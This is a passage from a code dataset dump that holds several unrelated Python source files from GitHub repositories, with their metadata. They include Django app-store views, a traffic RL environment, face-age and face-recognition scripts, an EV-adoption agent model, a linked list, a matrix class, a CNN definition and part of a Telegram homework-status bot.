post(self, request, id):\n form = AppRatingForm(request.POST, id=id, user=request.user)\n # there is no way that a rating can be invalid by default\n if form.is_valid() and request.user.is_authenticated:\n form.save()\n return redirect(\"app-detail\", id=id)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[\"DISCOURSE_URL\"] = settings.DISCOURSE_URL.rstrip(\"/\")\n context[\"rating_form\"] = AppRatingForm(initial={\"language_code\": get_language()})\n\n ratings = AppRating.objects.filter(app=context[\"app\"])\n rating_languages = flatmap(lambda r: r.get_available_languages(), ratings)\n\n # make sure current session language is in the list even if there are\n # no comments.\n rating_languages = list(rating_languages)\n if get_language() not in rating_languages:\n rating_languages.append(get_language())\n\n context[\"languages\"] = set(sorted(rating_languages))\n context[\"fallbackLang\"] = \"en\" if \"en\" in context[\"languages\"] else \"\"\n context[\"user_has_rated_app\"] = False\n if self.request.user.is_authenticated:\n try:\n app_rating = AppRating.objects.get(user=self.request.user, app=context[\"app\"])\n\n # if parler falls back to a fallback language\n # it doesn't set the language as current language\n # and we can't select the correct language in the\n # frontend. So we try and find a languge that is\n # available\n language_code = app_rating.get_current_language()\n if not app_rating.has_translation(language_code):\n for fallback in app_rating.get_fallback_languages():\n if app_rating.has_translation(fallback):\n app_rating.set_current_language(fallback)\n\n # when accessing an empty comment django-parler tries to\n # fall back to the default language. However for comments\n # the default (English) does not always exist. Unfortunately\n # it throws the same exception as non existing models,\n # so we need to access it beforehand\n try:\n comment = app_rating.comment\n except AppRating.DoesNotExist:\n comment = \"\"\n\n context[\"rating_form\"] = AppRatingForm(\n {\n \"rating\": app_rating.rating,\n \"comment\": comment,\n \"language_code\": app_rating.get_current_language(),\n }\n )\n context[\"user_has_rated_app\"] = True\n except AppRating.DoesNotExist:\n pass\n context[\"categories\"] = Category.objects.prefetch_related(\"translations\").all()\n context[\"latest_releases_by_platform_v\"] = self.object.latest_releases_by_platform_v()\n context[\"is_integration\"] = self.object.is_integration\n return context\n\n\nclass AppReleasesView(DetailView):\n queryset = App.objects.prefetch_related(\n \"translations\",\n \"releases__translations\",\n \"releases__phpextensiondependencies__php_extension\",\n \"releases__databasedependencies__database\",\n \"releases__shell_commands\",\n \"releases__licenses\",\n )\n template_name = \"app/releases.html\"\n slug_field = \"id\"\n slug_url_kwarg = \"id\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.prefetch_related(\"translations\").all()\n\n releases = self.object.releases_by_platform_v()\n unstables = self.object.unstable_releases_by_platform_v()\n versions = set(list(releases.keys()) + list(unstables.keys()))\n all_releases = list(map(lambda v: (v, releases.get(v, []) + unstables.get(v, [])), versions))\n context[\"releases_by_platform_v\"] = self._sort_by_platform_v(all_releases)\n return context\n\n def _sort_by_platform_v(self, releases_by_platform, reverse=True):\n \"\"\"Sorts a list of tuples like (, [releases]) by\n platform version.\n\n :param releases_by_platform: A list of tuples.\n :param reverse: Descending order if True, ascending otherwise.\n :return sorted list of tuples.\n \"\"\"\n\n return sorted(releases_by_platform, reverse=reverse, key=lambda v: Version(pad_min_version(v[0])))\n\n\nclass CategoryAppListView(ListView):\n model = App\n template_name = \"app/list.html\"\n allow_empty = True\n\n def get_queryset(self):\n order_by = self.request.GET.get(\"order_by\", \"rating_overall\")\n ordering = self.request.GET.get(\"ordering\", \"desc\")\n is_featured = self.request.GET.get(\"is_featured\", False)\n maintainer = self.request.GET.get(\"maintainer\", False)\n sort_columns = []\n\n if self.kwargs.get(\"is_featured_category\", False):\n is_featured = \"true\"\n\n allowed_order_by = {\"name\", \"last_release\", \"rating_overall\", \"rating_recent\"}\n if order_by in allowed_order_by:\n if order_by == \"name\":\n order_by = \"translations__name\"\n if ordering == \"desc\":\n sort_columns.append(\"-\" + order_by)\n else:\n sort_columns.append(order_by)\n\n lang = get_language_info(get_language())[\"code\"]\n category_id = self.kwargs[\"id\"]\n queryset = (\n App.objects.search(self.search_terms, lang)\n .order_by(*sort_columns)\n .filter(Q(releases__gt=0) | (Q(is_integration=True) & Q(approved=True)))\n )\n if maintainer:\n try:\n user = User.objects.get_by_natural_key(maintainer)\n queryset = queryset.filter(Q(owner=user) | Q(co_maintainers=user))\n except ObjectDoesNotExist:\n return queryset.none()\n if category_id:\n queryset = queryset.filter(categories__id=category_id)\n if is_featured == \"true\":\n queryset = queryset.filter(is_featured=True)\n return queryset.prefetch_related(\"screenshots\", \"translations\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.prefetch_related(\"translations\").all()\n category_id = self.kwargs[\"id\"]\n context[\"is_featured_category\"] = self.kwargs.get(\"is_featured_category\", False)\n if category_id:\n context[\"current_category\"] = get_object_or_404(Category, id=category_id)\n if self.search_terms:\n context[\"search_query\"] = \" \".join(self.search_terms)\n context[\"url_params\"] = self.url_params\n return context\n\n @cached_property\n def url_params(self):\n \"\"\"URL encoded strings with the GET params of the last request.\n\n Intended for preserving GET params upon clicking a link by including\n one (and only one) of these strings in the \"href\" attribute.\n\n The parameters are divided into three groups: search, filters and\n ordering. In addition to these three, the returned dict also contains\n some combinations of them, as specified by the dict keys.\n\n No leading \"?\" or \"&\".\n\n :return dict with URL encoded strings.\n \"\"\"\n\n search = self._url_params_str(\"search\")\n filters = self._url_params_str(\"is_featured\", \"maintainer\")\n ordering = self._url_params_str(\"order_by\", \"ordering\")\n\n return {\n \"search\": search,\n \"filters\": filters,\n \"ordering\": ordering,\n \"search_filters\": self._join_url_params_strs(search, filters),\n \"filters_ordering\": self._join_url_params_strs(filters, ordering),\n }\n\n def _url_params_str(self, *params):\n args = map(lambda param: (param, self.request.GET.get(param, \"\")), params)\n present_args = filter(lambda a: a[1], args)\n return urlencode(dict(present_args))\n\n def _join_url_params_strs(self, *strings):\n return \"&\".join(filter(None, strings))\n\n @cached_property\n def search_terms(self):\n return self.request.GET.get(\"search\", \"\").strip().split()\n\n\nclass AppUploadView(LoginRequiredMixin, TemplateView):\n template_name = \"app/upload.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"form\"] = AppReleaseUploadForm()\n return context\n\n\nclass AppRegisterView(LoginRequiredMixin, TemplateView):\n template_name = \"app/register.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"form\"] = AppRegisterForm()\n return context\n","repo_name":"nextcloud/appstore","sub_path":"nextcloudappstore/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11007,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"27"} +{"seq_id":"39188735600","text":"import yaml\nimport gym\nimport numpy as np\nfrom wolf.utils.configuration.registry import R\n\n\nclass TrafficEnv:\n\n def __init__(self):\n # config_path = '/home/parth/repos/traffic-management/sow45_code3/wolf/ray/tests/traffic_env/test4_2/iql_global_reward_no_dueling_dtse.yaml'\n # config_path = '/home/parth/repos/traffic-management/sow45_code3/wolf/ray/tests/traffic_env/test4_2/iql_global_reward_no_dueling_trans_image.yaml'\n config_path = '/home/parth/repos/traffic-management/sow45_code3/wolf/ray/tests/traffic_env/test0_1_1/iql_global_reward_dtse.yaml'\n \n env_name, env_config = self.load_config(config_path)\n # self._size = (16, 200) # for test4_2 dtse\n self._size = (4, 200) # for test0_1 dtse\n self._env = self.get_env(env_name, env_config)\n self._node_id = next(iter(self._env._agents.keys()))\n\n def load_config(self, config_path):\n with open(config_path) as file:\n config = yaml.safe_load(file)\n\n experiments = config['ray']['run_experiments']['experiments']\n experiment = next(iter(experiments.values()))\n env_name = experiment['config']['env']\n env_config = experiment['config']['env_config']\n env_config['horizon'] = experiment['config']['horizon']\n self.gamma = experiment['config']['gamma']\n\n return env_name, env_config\n\n def get_env(self, env_name, env_config):\n create_env = R.env_factory(env_name)\n env = create_env(env_config)\n return env\n\n @property\n def observation_space(self):\n shape = self._size + (2,)\n space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)\n return gym.spaces.Dict({'image': space})\n\n @property\n def action_space(self):\n return next(iter(self._env._agents.values())).action_space()\n\n # def step(self, action):\n # action = {self._node_id: action}\n # time_step = self._env.step(action)\n # obs = dict(time_step.observation)\n # obs['image'] = self.render()\n # reward = time_step.reward or 0\n # done = time_step.last()\n # info = {'discount': np.array(time_step.discount, np.float32)}\n # return obs, reward, done, info\n\n def step(self, action):\n action = {self._node_id: action}\n obs, reward, done, info = self._env.step(action)\n obs = self.transform_obs(obs)\n done = done['__all__']\n reward = reward[self._node_id]\n info = {'discount': np.array(self.gamma, np.float32)}\n return obs, reward, done, info\n\n def transform_obs(self, obs):\n # obs = obs[self._node_id]['dtse'] # shape: (1, 16, 200, 2)\n obs = obs[self._node_id] # shape: (1, 16, 200, 2)\n # obs = np.transpose(obs, (2, 0, 1))\n # obs['image'].shape: (64, 64, 3)\n return obs\n\n # def reset(self):\n # time_step = self._env.reset()\n # obs = dict(time_step.observation)\n # obs['image'] = self.render()\n # return obs\n\n def reset(self):\n obs = self._env.reset()\n self.obs = self.transform_obs(obs)\n return self.obs\n\n def render(self, *args, **kwargs):\n pass","repo_name":"parthjaggi/mb-exp","sub_path":"mcts/traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23988288046","text":"from torchvision import transforms\n\nfrom src.models.face_age_module import FaceAgeModule\n\nfrom pathlib import Path\n\n\nclass Predict:\n \"\"\"\n This class is used for loading the trained face age model and making predictions on a given image.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initializes the Predict class by loading the trained model, setting it to evaluation mode, and freezing its parameters.\n Also creates the image preprocessing pipeline using the torchvision library.\n \"\"\"\n\n ckpt_path = Path(\"models/best-checkpoint.ckpt\")\n assert ckpt_path.exists(), f\"Model checkpoint not found at: '{ckpt_path}'\"\n\n self.model = FaceAgeModule.load_from_checkpoint(ckpt_path)\n self.model.eval()\n self.model.freeze()\n transform_list = [\n transforms.ToTensor(),\n transforms.Resize((100, 100)),\n transforms.Resize((224, 224)),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ]\n self.transform = transforms.Compose(transform_list)\n\n def predict(self, image) -> float:\n \"\"\"\n Predict the age of a face in an image using a pre-trained model.\n Args:\n image (image): An image of a face.\n Returns:\n float: The predicted age of the face in the image.\n \"\"\"\n img = self.transform(image)\n img = img.reshape(1, 3, 224, 224)\n prediction = self.model.forward(img)\n prediction_rescaled = prediction * 80\n prediction_rescaled = prediction_rescaled.clip(1, 80)\n return prediction_rescaled.item()\n","repo_name":"warsaw-ml/IntroToML","sub_path":"src/utils/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31992983096","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"FaceRecognition.py: A Command line tool for Face Detection and Recognition with Own Data Set.\"\"\"\n\n__author__ = \"Anupam Bera\"\n__email__ = \"anupam.bera@gmail.com\"\n\nimport face_recognition\nimport cv2\nimport numpy as np\n\nimport os\n'''\n Get current working director and create a Data directory to store the faces\n'''\ncurrentDirectory = os.getcwd()\ndirName = os.path.join(currentDirectory, 'Data')\nprint(dirName)\nif not os.path.exists(dirName):\n try:\n os.makedirs(dirName)\n except:\n raise OSError(\"Can't create destination directory (%s)!\" % (dirName))\n'''\n For the given path, get the List of all files in the directory tree \n'''\ndef getListOfFiles(dirName):\n # create a list of file and sub directories\n # names in the given directory\n listOfFile = os.listdir(dirName)\n allFiles = list()\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory\n if os.path.isdir(fullPath):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n\n return allFiles\n\ndef knownFaceEncoding(listOfFiles):\n known_face_encodings=list()\n known_face_names=list()\n for file_name in listOfFiles:\n # print(file_name)\n if(file_name.lower().endswith(('.png', '.jpg', '.jpeg'))):\n known_image = face_recognition.load_image_file(file_name)\n # known_face_locations = face_recognition.face_locations(known_image)\n # known_face_encoding = face_recognition.face_encodings(known_image,known_face_locations)\n face_encods = face_recognition.face_encodings(known_image)\n if face_encods:\n known_face_encoding = face_encods[0]\n known_face_encodings.append(known_face_encoding)\n known_face_names.append(os.path.basename(file_name[0:-4]))\n return known_face_encodings, known_face_names\n\n\n# Get the list of all files in directory tree at given path\nlistOfFiles = getListOfFiles(dirName)\nknown_face_encodings, known_face_names = knownFaceEncoding(listOfFiles)\n\nvideo_capture = cv2.VideoCapture(0)\ncv2.namedWindow(\"Video\", flags= cv2.WINDOW_NORMAL)\n# cv2.namedWindow(\"Video\")\n\ncv2.resizeWindow('Video', 1024,640)\ncv2.moveWindow('Video', 20,20)\n\n\n# known_face_encodings=list()\n# known_face_names=list()\n# for file_name in listOfFiles:\n# print(file_name)\n# if(file_name.lower().endswith(('.png', '.jpg', '.jpeg'))):\n# known_image = face_recognition.load_image_file(file_name)\n# # known_face_locations = face_recognition.face_locations(known_image)\n# # known_face_encoding = face_recognition.face_encodings(known_image,known_face_locations)\n# face_encods = face_recognition.face_encodings(known_image)\n# if face_encods:\n# known_face_encoding = face_encods[0]\n# known_face_encodings.append(known_face_encoding)\n# known_face_names.append(os.path.basename(file_name[0:-12]))\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\n\n\nwhile True:\n # Grab a single frame of video\n ret, frame = video_capture.read()\n # print(ret)\n # Resize frame of video to 1/4 size for faster face recognition processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n\n\n k = cv2.waitKey(1)\n if k == ord('q'):\n break\n elif k== ord('c'):\n face_loc = face_recognition.face_locations(rgb_small_frame)\n if face_loc:\n print(\"Enter Name -\")\n name = input()\n img_name = \"{}/{}.png\".format(dirName,name)\n (top, right, bottom, left)= face_loc[0]\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n cv2.imwrite(img_name, frame[top - 5 :bottom + 5,left -5 :right + 5])\n listOfFiles = getListOfFiles(dirName)\n known_face_encodings, known_face_names = knownFaceEncoding(listOfFiles)\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n # print(face_locations)\n\n face_names = []\n\n for face_encoding,face_location in zip(face_encodings,face_locations):\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding, tolerance= 0.55)\n name = \"Unknown\"\n distance = 0\n\n # use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n #print(face_distances)\n if len(face_distances) > 0:\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n # distance = face_distances[best_match_index]\n #print(face_distances[best_match_index])\n # string_value = '{} {:.3f}'.format(name, distance)\n face_names.append(name)\n\n\n process_this_frame = not process_this_frame\n\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom + 46), (right, bottom+11), (0, 0, 155), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom +40), font, 1.0, (255, 255, 255), 1)\n\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n","repo_name":"anupambera/Face-Recognition-with-Own-Data-Set","sub_path":"FaceRecognition.py","file_name":"FaceRecognition.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"74071984070","text":"__version__ = \"0.0.2\"\nimport pytorch_fid_wrapper as pfw\nfrom pytorch_sfid import params\nfrom pytorch_sfid.sfid import get_sfid, get_stats\n\n\ndef set_config(ncenters=None, radius=None, batch_size=None, dims=None,\n device=None):\n if ncenters is not None:\n assert isinstance(ncenters, int)\n assert ncenters > 0\n params.ncenters = ncenters\n if radius is not None:\n assert radius > 0\n assert 1 > radius\n params.radius = radius\n\n pfw.set_config(batch_size, dims, device)\n","repo_name":"evenmn/pytorch-sfid","sub_path":"pytorch_sfid/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"1208335166","text":"\"\"\"\nCustomer represent type of one model agent.\nCustomers are agents whose status will be counted and analyzed.\nAny Customer instance has indyvidual set of fields.\n- procfile -- mean annual mileage\n- home -- place in City\n- car -- see class Car\n\nThe customer is also responsible for the mechanism for buying a car\nand for choosing between two types.\n\"\"\"\nfrom random import random\nfrom typing import Tuple\n\nfrom .Cars import Car, Car_CV, Car_EV, Car_PHEV\nfrom .constants import CV, EV, PHEV, CarTypes\n\n\nclass Customer:\n \"\"\"Customer represent type of one model agent.\n Customers are agents whose status will be counted and analyzed.\n Any Customer instance has indyvidual set of fields.\n - procfile -- mean annual mileage\n - home -- place in City\n - car -- see class Car\n\n The customer is also responsible for the mechanism for buying a car\n and for choosing between two types.\n \"\"\"\n\n def __init__(\n self,\n society: \"Society\", # noqa\n car: Car,\n profile: CarTypes,\n city_size: Tuple[float, float],\n ) -> None:\n \"\"\"Customer represent type of one model agent.\n Customers are agents whose status will be counted and analyzed.\n\n Args:\n society (Society): society\n profile (CarTypes): Customer profile (average annual mileage)\n city_size (Tuple[float, float]): City size to random draw home place.\n \"\"\"\n self.society = society\n self.car = car\n self.profile = profile\n self._home = (\n random() * city_size[0],\n random() * city_size[1],\n )\n\n def have_working_car(self, year: int, month: int) -> bool:\n \"\"\"This method compare actual car are and them lifetime.\n Car is working if his age < lifetime.\n\n Args:\n year (int): Current year.\n month (int): Current month.\n\n Returns:\n bool: True if customers car is working, False in other case.\n \"\"\"\n return self.car.is_operational(year, month)\n\n def get_car_type(self) -> CarTypes:\n \"\"\"Get customers car type.\n\n Returns:\n CarTypes: Customers car type.\n \"\"\"\n return self.car.car_type\n\n def buy(self, car_type: CarTypes, current_year: int, current_month: int):\n \"\"\"Buy new car with seted type\n\n Args:\n car_type (CarTypes): Type of car to buy.\n year (int): Current year.\n month (int): Current month.\n \"\"\"\n self.society.government.get_subsidy(car_type)\n if car_type == EV:\n self.car = Car_EV(current_year, current_month)\n elif car_type == CV:\n self.car = Car_CV(current_year, current_month)\n elif car_type == PHEV:\n self.car = Car_PHEV(current_year, current_month)\n\n def choose(\n self,\n car_type1: CarTypes,\n car_type2: CarTypes,\n current_year: int,\n current_month: int,\n ):\n \"\"\"Chose betwean two car types and buy one.\n\n Args:\n car_type1 (CarTypes): First car type to buy.\n car_type2 (CarTypes): Second car type to buy.\n current_year (int): Current year.\n current_month (int): Current month.\n \"\"\"\n if self.profile in (car_type1, car_type2):\n self.buy(self.profile, current_year, current_month)\n elif self.profile in (CV, EV):\n self.buy(PHEV, current_year, current_month)\n elif random() < 1 / 2:\n self.buy(car_type1, current_year, current_month)\n else:\n self.buy(car_type2, current_year, current_month)\n\n @property\n def home(self) -> Tuple[float, float]:\n \"\"\"Get position of customer's house.\n\n Returns:\n Tuple[float, float]: Position of customer's house.\n \"\"\"\n return self._home\n","repo_name":"chwilko/agent-based-model-adoption-of-electric-vehicles","sub_path":"model/Customer.py","file_name":"Customer.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30323456119","text":"#Basic implementation of linked list\nclass node:\n def __init__(self,x):\n self.data=x\n self.next=None\n \nclass List:\n def __init__(self):\n self.head = None\n self.tail=None\n \n def insertfirst(self,x):\n temp=node(x)\n if self.head is None:\n self.head=self.tail=temp\n else:\n temp.next=self.head\n self.head=temp\n \n def insertlast(self,x):\n self.temp=node(x)\n if self.head==None:\n self.head=self.tail=self.temp\n else:\n self.tail.next=self.temp\n self.tail=self.temp\n \n def deletefirst(self):\n if self.head==None:\n print(\"list is empty\")\n elif self.head==self.tail:\n self.head=self.tail=None\n else:\n x=self.head.data\n self.head=self.head.next\n return x\n \n def deletelast(self):\n if self.head==None:\n print(\"list is empty\")\n elif self.head==self.tail:\n self.head=self.tail=None\n else:\n x=self.tail.data\n t=node(0)\n t=self.head\n while t.next!=self.tail:\n t=t.next\n t.next=None\n self.tail=t\n return x\n \n def display(self):\n t=node(0)\n t=self.head\n while t!=None:\n print(t.data)\n t=t.next\n \nif __name__=='__main__': \n llist=List()\n llist.insertfirst(1)\n llist.insertfirst(2)\n llist.insertfirst(5)\n llist.insertlast(9)\n llist.deletefirst()\n llist.deletelast()\n llist.display()\n\n\n\n","repo_name":"IMSRIJAN04/python_scripts","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28985404202","text":"# coding: utf-8\nimport os, time, json \n\nfrom Entree_sortie_lock import Entree_sortie_lock\n\ndef fonction_test (dico, data) :\n time.sleep (1)\n assert data == \"OK\"\n return dico, 'done'\n\n\ndef test_Entree_sortie_lock () :\n \n nom_environnement = \"test\"\n pathFile = 'echanges/echanges.json'\n path = '../data/'+ nom_environnement + '/parametres/'\n pathName = 'test.txt' \n pathFile = path + pathName\n if os.path.exists(pathFile) :\n os.remove (pathFile)\n \n pathFile_lock = pathFile + '.lock'\n if os.path.exists(pathFile_lock) :\n os.remove (pathFile_lock)\n \n f = open (pathFile, 'w')\n dico = {}\n data = json.dumps (dico)\n f.write(data)\n f.close()\n \n \n arg = {}\n arg ['pathFile'] = pathFile\n \n \n \n G = Entree_sortie_lock (arg)\n \n dico, resultat = G.execution_with_lock (fonction_test, data = \"OK\" )\n assert dico == {}\n assert resultat == 'done'\n \n \n dico = G.lire_with_lock()\n assert dico == {}\n assert resultat == 'done'\n \n dico ['test'] = 'OK'\n G.ecrire_with_unlock (dico)\n \n \n dico = G.lire_with_lock()\n G.unlock_lire ()\n assert dico == {'test' : 'OK'}\n # on nettoie\n if os.path.exists(pathFile) :\n os.remove (pathFile)\n \n \n \n \n \n \n \n \n \nif __name__ == '__main__' :\n test_Entree_sortie_lock ()\n print ('fin test_Entree_sortie_lock')\n","repo_name":"Patrick1953/Behavior","sub_path":"outils/test_entree_sortie_lock.py","file_name":"test_entree_sortie_lock.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32143098359","text":"class Matrix:\n def __init__(self, m):\n self.m = m\n\n # inplace rotate right (only for square matrix)\n def rotate(self):\n N = len(self.m[0])\n for i in range(N//2):\n for j in range((N+1)//2):\n self.m[j][N-1-i], self.m[N-1-i][N-1-j], self.m[N-1-j][i], self.m[i][j] = \\\n self.m[i][j], self.m[j][N-1-i], self.m[N-1-i][N-1-j], self.m[N-1-j][i]\n\n # inplace transpose (only for square matrix)\n def transpose(self):\n N = len(self.m[0])\n for i in range(N):\n for j in range(i + 1, N):\n self.m[i][j], self.m[j][i] = self.m[j][i], self.m[i][j]\n \n # inplace reflect columns\n # [[1,2], => [[2,1],\n # [3,4]] [4,3]]\n def reflect(self):\n N = len(self.m[0])\n for j in range(N // 2):\n for i in range(N):\n self.m[i][j], self.m[i][N-1-j] = self.m[i][N-1-j], self.m[i][j]\n\n def mult(self, B):\n N = len(self.m)\n M = len(self.m[0]) \n R = len(B.m[0])\n ans = Matrix([[0 for _ in range(R)] for _ in range(N)])\n for i in range(N):\n for j in range(R):\n for k in range(M):\n ans.m[i][j] += self.m[i][k] * B.m[k][j]\n return ans\n\n def __eq__(self, B):\n N = len(self.m)\n M = len(self.m[0])\n if N != len(B.m) or M != len(B.m[0]):\n return False\n for i in range(N):\n for j in range(M):\n if self.m[i][j] != B.m[i][j]:\n return False\n return True\n\n def __repr__(self):\n return repr(self.m)\n\nm1 = Matrix([[1, 2, 3], [4, 5, 6]])\nm2 = Matrix([[6, 5], [4, 3], [2, 1]])\nprint(m1.mult(m2))\n\nm3 = Matrix([[10], [20], [30]])\nprint(m1.mult(m3))\n\nm4 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nprint(m4)\nm4.rotate()\nprint(m4)\n\nm5 = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nm5.transpose()\nprint(m5)\nm5.reflect()\nprint(m5)\n\nprint(m4 == m5)","repo_name":"DingChiLin/AlgorithmSampleCode","sub_path":"Math/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"32600409306","text":"# import the necessary packages\nfrom keras.models import Sequential # these 2 are added for regularization\nfrom keras.layers import Dense, Conv2D, MaxPool2D, Flatten, BatchNormalization, Dropout\nfrom keras import backend as K\n\n\nclass NovelCNN:\n @staticmethod\n def build(width, height, depth, classes):\n # initialize the model along with the input shape to be\n # \"channels last\"\n model = Sequential()\n inputShape = (height, width, depth)\n\n # if we are using \"channels first\", update the input shape\n if K.image_data_format() == \"channels_first\":\n inputShape = (depth, height, width)\n\n model.add(Conv2D(input_shape=inputShape,filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2))) # 'raw' = 73%\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n model.add(BatchNormalization())\n\n model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n model.add(BatchNormalization()) # batch norms = 83%\n\n model.add(Flatten())\n model.add(Dense(units=4096,activation=\"relu\")) \n model.add(Dropout(0.3)) # 0.3 in both dropouts = 90%\n model.add(Dense(units=4096,activation=\"relu\"))\n model.add(Dropout(0.3))\n model.add(Dense(units=classes, activation=\"softmax\"))\n \n # return the constructed network architecture\n model.summary()\n return model","repo_name":"AidenWilliams/Speaker-Identification-Using-CNNs","sub_path":"Part 2/NovelCNN.py","file_name":"NovelCNN.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31196204915","text":"import logging\nimport os\nimport requests\nimport telegram\nimport time\nfrom dotenv import load_dotenv\nfrom http import HTTPStatus\n\nimport exceptions\n\n\nload_dotenv()\n\n\nPRACTICUM_TOKEN = os.getenv('PRACTICUM_TOKEN')\nTELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')\nTELEGRAM_CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')\n\nRETRY_TIME = 600\nENDPOINT = 'https://practicum.yandex.ru/api/user_api/homework_statuses/'\nHEADERS = {'Authorization': f'OAuth {PRACTICUM_TOKEN}'}\n\n\nHOMEWORK_STATUSES = {\n 'approved': 'Работа проверена: ревьюеру всё понравилось. Ура!',\n 'reviewing': 'Работа взята на проверку ревьюером.',\n 'rejected': 'Работа проверена: у ревьюера есть замечания.'\n}\n\n\nlogging.basicConfig(\n filename='error.log',\n format='%(asctime)s - %(levelname)s - %(message)s',\n level=logging.DEBUG\n)\n\n\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nlogger.addHandler(handler)\n\n\ndef send_message(bot, message):\n \"\"\"Отправляем сообщение в телеграм.\"\"\"\n try:\n bot.send_message(TELEGRAM_CHAT_ID, message)\n logger.info('отправлено сообщение в телеграм')\n except telegram.error.TelegramError:\n raise exceptions.MessageNotSendedException('Не отправлено')\n\n\ndef get_api_answer(current_timestamp):\n \"\"\"Проверяем ответ API.\"\"\"\n timestamp = current_timestamp or int(time.time())\n params = {'from_date': timestamp}\n try:\n response = requests.get(ENDPOINT, headers=HEADERS, params=params)\n except requests.RequestException as e:\n raise exceptions.APIRequestException(\n f'Ошибка {e} при получении ответа: {ENDPOINT}, {HEADERS}, {params}'\n )\n if response.status_code != HTTPStatus.OK:\n raise exceptions.APIStatusCodeException(\n f'Ответ сервера {response.status_code}'\n )\n logger.info('Получен ответ')\n homework = response.json()\n if ('error' or 'code') in homework:\n raise exceptions.WrongAPIAnswerException('Ошибка json')\n return homework\n\n\ndef check_response(response):\n \"\"\"Проверяем полученный ответ.\"\"\"\n if not isinstance(response, dict):\n raise TypeError('В ответе не словарь')\n if response.get('current_date') is None:\n raise KeyError('В ответе нет current_date')\n homeworks = response['homeworks']\n if not isinstance(homeworks, list):\n raise TypeError('В ответе не список')\n return homeworks\n\n\ndef parse_status(homework):\n \"\"\"Ищем подходящий статус.\"\"\"\n homework_name = homework.get('homework_name')\n if 